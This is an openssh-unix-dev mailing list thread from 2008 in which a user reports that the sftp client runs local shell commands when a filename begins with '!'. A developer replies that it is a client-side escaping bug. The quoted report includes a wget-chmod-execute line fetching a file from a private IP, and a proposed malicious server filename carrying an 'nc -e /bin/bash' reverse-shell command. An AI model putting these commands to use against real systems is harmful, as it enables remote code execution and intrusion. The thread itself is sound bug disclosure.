Strange sftp input parameter handling, user assisted code execution?
Ben Lindstrom
mouring at eviladmin.org
Wed Jun 18 03:29:11 EST 2008
I would consider that the use of "get !ls" would be a client side bug in
escaping (I suspect it should be filed as a ticket in
bugzilla.mindrot.org). sftp should translate "get !ls" into either "get
\!ls" or into the quoted counterpart.
However, I'm not sure what this has to do with the server. Since !
produces a local shell and has nothing to do with the remote server.
- Ben
On Tue, 17 Jun 2008, Roman Fiedler wrote:
> Hello list,
>
> I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
>
> sftp> get !xxxx
> /bin/bash: xxxx: command not found
> Shell exited with status 127
>
>
> sftp> get !/bin/ls -al
> total 2132
> drwxr-xr-x 4 admin users 4096 2008-06-17 16:33 .
> drwxr-xr-x 16 admin users 12288 2008-06-17 08:50 ..
> drwxr-xr-x 3 admin users 8 2008-05-21 18:38 gd
>
>
> sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
> --16:54:37-- http://10.255.255.2:1234/root
> => `root'
> Connecting to 10.255.255.2:1234... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 123
>
> 100%[====================================>] 123 13.59B/s
> ETA 00:00
>
> 16:55:49 (7.08 B/s) - `root' saved [123/123]
>
> ./root: line 1: afdasfasf: command not found
> ./root: line 3: asdfa: command not found
> Shell exited with status 127
> sftp>
>
> On a linux server I did not manage to create a file with a / in the
> name, but a manipulated server could return such filenames or other
> strategies do not need them, e.g.
> touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
> to download is also a good one.
>
> Has someone observed this behavior?
> Is this just a strange thing but according to the specs or a bug?
>
> lg roman
> _______________________________________________
> openssh-unix-dev mailing list
> openssh-unix-dev at mindrot.org
> https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev
>
More information about the openssh-unix-dev
mailing list